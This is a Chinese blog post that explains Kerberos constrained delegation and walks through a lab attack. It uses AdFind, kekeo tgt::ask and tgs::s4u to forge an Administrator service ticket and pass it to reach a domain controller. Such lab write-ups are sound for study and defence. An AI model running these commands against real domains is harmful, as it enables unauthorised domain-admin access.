域渗透委派攻击之约束委派

最新推荐文章于 2024-01-28 23:30:37 发布
最新推荐文章于 2024-01-28 23:30:37 发布
阅读量827 收藏 1
点赞数
分类专栏: 安全 文章标签: java 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/127839243
版权

约束委派

约束委派(Constrained Delegation)即 Kerberos 的扩展协议 S4U2Proxy,服务账号只能获取某用户的 TGS ,从而只能模拟用户访问特定的服务,这也相对应非约束委派更安全一些。

约束委派攻击原理及利用

由于非约束委派的不安全性(配置了非约束委派的机器在 LSASS 中缓存了用户的 TGT 票据可模拟用户去访问域中任意服务),微软在 Windows Server 2003 中引入了约束委派,对 Kerberos 协议进行拓展,引入了 S4U (S4U2Self / S4U2proxy), 运行服务代表用户向 KDC 请求票据。

  • S4U2self (Service for User to S4U2Self) 可以代表自身请求针对其自身的 Kerberos 服务票据(ST);如果一个服务账户的 userAccountControl 标志为 TRUSTED_TO_AUTH_FOR_DELEGATION, 则其可以代表任何其他用户获取自身服务的 TGS/ST。

  • S4U2proxy(Service for User to Proxy) 可以以用户的名义请求其它服务的 ST,限制了 S4U2proxy 扩展的范围。服务帐户可以代表任何用户获取在 msDS-AllowedToDelegateTo 中设置的服务的 TGS/ST,首先需要从该用户到其本身的 TGS/ST,但它可以在请求另一个 TGS 之前使用 S4U2self 获得此 TGS/ST。

不同于允许委派所有服务的非约束委派,约束委派的目的是在模拟用户的同时,限制委派机器/帐户对特定服务的访问。

S4U2self

(1) 用户向 service1 发送请求。用户已通过身份验证,但 service1 没有用户的授权数据。通常,这是由于身份验证是通过 Kerberos 以外的其他方式验证的。

(2) 通过 S4U2self 扩展以用户的名义向 KDC 请求用于访问 service1 的 ST1。

(3) KDC 返回给 service1 一个用于用户验证 service1 的 ST1,该 ST1 可能包含用户的授权数据。

(4) service1 可以使用 ST 中的授权数据来满足用户的请求,然后响应用户。

尽管 S4U2self 向 service1 提供有关用户的信息,但 S4U2self 不允许 service1 代表用户发出其他服务的请求,这时候就轮到 S4U2proxy 发挥作用了。

S4U2proxy:

(5) 用户向 service1 发送请求,service1 需要以用户身份访问 service2 上的资源。

(6) service1 以用户的名义向 KDC 请求用户访问 service 2的 ST2。

(7) 如果请求中包含 PAC,则 KDC 通过检查 PAC 的签名数据来验证 PAC ,如果 PAC 有效或不存在,则 KDC 返回 ST2 给 service1,但存储在 ST2 的 cname 和 crealm 字段中的客户端身份是用户的身份,而不是 service1 的身份。

(8) service1 使用 ST2 以用户的名义向 service2 发送请求,并判定用户已由 KDC 进行身份验证。

(9) service2 响应步骤 8 的请求。

(10) service1 响应用户对步骤 5 中的请求。

域环境

域管:dc1 10.10.10.142

备用域管:dc2 10.10.10.140

域用户1:12server1 10.10.10.152

域用户2: 12server2 10.10.10.138

环境搭建

此处如果没有用户,需要新建个用户,加上spn标识为服务用户

setspn -A cifs/12server2.redteam.club websec 
设置服务用户对websec的cifs服务的委派

 

配置服务账号,添加域控主机名ad1

 

已知在约束委派的情况下,服务用户只能获取某个用户或者主机的服务ST,只能用模拟用户访问特定的服务,
是无法获取用户的TGT的,如果能够获得到开启了约束委派的服务的用户的明文密码或者hash就可以伪造S4U
的请求,进而伪造服务用户以任意账户的权限访问服务的ST

漏洞复现

设置约束用户存在 TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION 关键字

使用命令查询约束用户

AdFind.exe -b "DC=redteam,DC=club" -f "(&(samAccountType=805306368)(msdsallowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

 

通过kekeo请求服务用户的TGT
tgt::ask /user:websec /domain:redteam.club /password:pass@123 /ticket:test.kirbi
同理此处利用ntlm hash也是可以进行请求的
tgt::ask /user:websec /domain:redteam.club /NTLM:XXXXX

 

利用这个票据通过伪造S4U请求以administrator身份访问websec的ST
tgs::s4u /tgt:TGT_websec@REDTEAM.CLUB_krbtgt~redteam.club@REDTEAM.CLUB.kirbi /user:Administrator@redteam.club /service:cifs/ad1.redteam.club

 

这时候kekeo当前路径下会出现administrator的ticket (用于访问websec的CIFS服务),导入这个tiket即可 访问websec的cifs服务: 使用kekeo导入票据访问域控

keberos::ptt
TGS_Administrator@redteam.club@REDTEAM.CLUB_cifs~ad1.redteam.club@REDTEAM.CLUB.k
irbi

 

访问域控

参考链接

域渗透委派攻击之约束委派_全局变量Global的博客-CSDN博客_约束委派

域渗透之委派攻击详解(非约束委派/约束委派/资源委派) - 腾讯云开发者社区-腾讯云

斩尽杀绝,这是对一个文明最高的重视

 

夜yesec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
论文研究 - 具有一般线性和二次约束的组合数学
05-17
本文探讨了在一般意义上同时考虑相对效用和风险时,最优投资组合构建的数学基础。 当同时受到一般班轮约束和跟踪误差约束(二次约束)时,我得出了投资组合优化问题,这是委派给投资组合经理的最普遍的约束。 这将最优投资组合理论的演变归纳为三篇非常有影响力的论文。 另外,我还分析了应用于Sharpe Ratio最大化时的一般线性约束。 当一起使用时,这些公式可以使委托人和代理人更好地分析替代方案并协商合同,以确保约束条件产生适当的效用最大化。
rbcd-attack:使用Impacket从外部进行基于Kerberos资源的约束委派攻击
04-01
滥用基于Kerberos资源的约束委派 TL; DR 此存储库是针对Windows Active Directory中针对Kerberos资源的约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是从加入的计算机(通常是Windows)发起的攻击。 仅使用Python3 (及其依赖项)实施攻击。 在上测试了最新的Impacket(撰写本文时为0.9.21)。 攻击 总而言之,攻击没有针对任何深度细节,而是针对计算机,正是与目标计算机相关的服务主体。 我们在这里需要具备的先决条件: 具有对目标计算机的写访问权的帐户(对目标计算机对象的msDS-AllowedToActOnBehalfOfOtherIdentity属性的完全写访问权) 创建新计算机帐户的权限(通常是默认设置,请参见MachineAccount
rubeus+spoolsample.zip渗透约束委派攻击实验
08-19
渗透中非约束性而委派攻击实验所用到的工具已经编译好了,直接食用
StandIn:StandIn是一个小型的.NET3545 AD开发后工具包
04-12
站在 StandIn是一个小型的AD折衷后工具包。 之所以出现StandIn,是因为最近在我们需要一个.NET本机解决方案来执行基于资源的约束委派。 但是,StandInSwift膨胀,包括许多舒适功能。 我想继续开发StandIn,以使自己更多地了解Directory Services编程,并希望扩展适用于AD开发后工具链的工具。 路线图 贡献 欢迎捐款。 请确保拉取请求包括以下各项:功能说明,简要的技术说明和示例输出。 待办事项 当前备受关注的以下项目可用于StandIn的后续版本中。 共享枚举。 这可以分为两个部分:(1)根据用户主目录/脚本路径/配置文件路径查找和获取唯一列表,以及(2)查询fTDfs / msDFS-Linkv2对象。 查找并解析GPO,以将用户映射到托管本地组。 学科参考 一个ACE袖子( & )- Kerberoasting(通过 )- 烘焙AS
SharpAllowedToAct:通过基于资源的约束委派(msDS-AllowedToActOnBehalfOfOtherIdentity)进行计算机对象接管
05-24
夏普允许行动 描述 基于通过基于资源约束委派(MSDS-AllowedToActOnBehalfOfOtherIdentity)C#实现的计算机对象接管的由 。 积分也他的,并作为我的代码依赖于他的工具。 编译指令 确保成功安装了必要的NuGet软件包,并仅构建项目。
约束委派攻击
yy
04-11 7208
当我们查询到约束委派的用户或主机时,并知晓它的明文密码或NTLM hash,才能利用工具请求它的TGT;然后利用这个TGT,伪造S4U请求以administrator身份去访问这个服务账号的ST;这里可以生成任意权限身份的ticket,我们是以administrator身份去访问的,所以生成的就是administrator的ticket,这个就是ST;最后使用工具导入这个ST,那我们就能够成功访问控;通常约束委派多数用于用户权限维持。
渗透约束委派
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
09-20 2455
渗透约束委派的利用
内网安全:非约束委派 约束委派 资源约束委派
最新发布
qq_61553520的博客
01-28 1488
实验靶场:redteam.red。
控-笔记三(非约束委派攻击约束委派攻击
5L2g556F5ZWl77yf
11-25 2431
文章目录一. 委派1.1 委派分类1.2 委派流程1.3 使用委派条件1.4 委派的一些原理二. 委派攻击2.1 非约束委派攻击本地环境非约束委派的查找 一. 委派 1.1 委派分类 非约束委派(Unconstrained delegation) 服务账号可以获取被委派用户的TGT,并将TGT缓存到LSASS进程中,从而服务账号可使用该TGT,模拟用户访问任意服务。配置了非约束委派的账户的userAccountControl 属性有个FLAG位 WORKSTATION_TRUSTED_FOR_DE
渗透完全技巧.pdf
10-03
1.无凭证情况下 网络扫描 漏洞快速探测 提权 拥有本地管理员权限 ...token窃取 ...卷影拷贝(获取控所有hash) dpapi解密 ...Kerberos委派 地址解析协议 zerologon漏洞 CVE-2021-42278 && CVE-2021-42287
java设计模式之委派模式原理分析
08-25
主要介绍了java设计模式之委派模式原理分析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
AD委派后门详解-1
06-19
委派是指,将内用户的权限委派给服务账号,使得服务账号能以...可通过利用委派攻击获取管理员权限。 委派主要分为三种: 在Windows系统中,只有服务账号和主机账号的属性才有委派功能,普通用户默认是没有的。
实例分析JVM安全体系双亲委派命名空间保护策略Java
11-25
实例分析JVM安全体系双亲委派命名空间保护策略Java开发Java经验技巧共23页.pdf.zip
Kerberos 委派攻击约束委派
Adminxe的博客
03-06 396
CSDN自动博客文章迁移由于非约束委派的不安全性,微软在 Windows Server 2003 中引入了约束委派。区别在于不会直接把 TGT 给服务,所发送的认证信息中包含了允许访问的服务,即不允许服务代表用户去访问其他服务。同时为了在 Kerberos 协议层面对约束委派的支持, 微软扩展了两个子协议:S4U2SelfS4U2ProxyS4U2Self可以代表自身请求针对其自身的 Kerberos 服务票据STS4U2Proxy。
Kerberos 委派攻击之基于资源的约束委派
Adminxe的博客
03-06 581
CSDN自动迁移博客文章注意区别:约束委派 不能跨进行委派,基于资源的约束委派可以跨和林如果约束委派,必须拥有权限,该特权是敏感的,通常仅授予管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源的约束委派。基于资源的约束委派不需要管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源的约束委派允许资源配置受信任的帐户委派给他们。基于资源的约束委派只能在运行 ·Windows Server 2012 及以上的控制器·上配置,
[内网渗透]—约束委派攻击
Sentiment的博客
12-08 669
首先了解一下什么是委派委派即委托安排,我把这件事委托给你做了。委派是指将内用户的权限委派给服务账号,使得服务账号能以用户的权限在内展开活动。
内网横向移动—非约束委派&约束委派
剁椒鱼头没剁椒的博客
08-01 614
在Windows 2000 Server首次发布Active Directory时,Microsoft必须提供一种简单的机制来支持用户通过kerberos向web server进行身份验证并需要代表该用户更新后端数据库服务器上的记录的方案。这通常称为"kerberos双跳问题",并且要求进行委派,以便web server在修改数据库记录时模拟用户。
Kerbeeros-束性委派攻击
m0_75218183的博客
06-11 637
对于约束委派,服务账户只能获取该用户对指定服务的ST,从而只能模拟该用户访问特定的服务。配置了约束委派账户的msDS-AllowedToDelegateTo 属性会指定对哪个SPN进行委派约束委派的设置需要SeEnableDelegationPrivilege特权,该特权默认仅授予管理员和企业管理员。
ad 账号委派一个普通账号具有解锁用户的功能
07-14
要在 AD 中将一个普通账号委派具有解锁用户的功能,您可以按照以下步骤进行操作: 1. 打开 "Active Directory 用户和计算机" 管理工具,确保您具有适当的管理员权限。 2. 找到您要委派权限的 OU(组织单位)或特定用户。 3. 右键单击 OU 或用户,选择 "属性"。 4. 在 "属性" 窗口中,切换到 "安全" 选项卡。 5. 点击 "高级" 按钮,打开 "高级安全设置" 窗口。 6. 在 "高级安全设置" 窗口中,点击 "添加" 按钮,选择要委派权限的普通账号。 7. 在 "权限" 列表中,找到并选中 "解锁帐户" 权限。如果您只想委派该权限的一部分,可以使用 "自定义" 选项来选择具体的权限。 8. 点击 "确定" 保存更改并关闭所有打开的窗口。 现在,您已经成功将解锁用户的功能委派给了普通账号。该账号现在具有解锁其他用户账号的权限。请确保谨慎选择要委派权限的账号,并确保遵循安全最佳实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值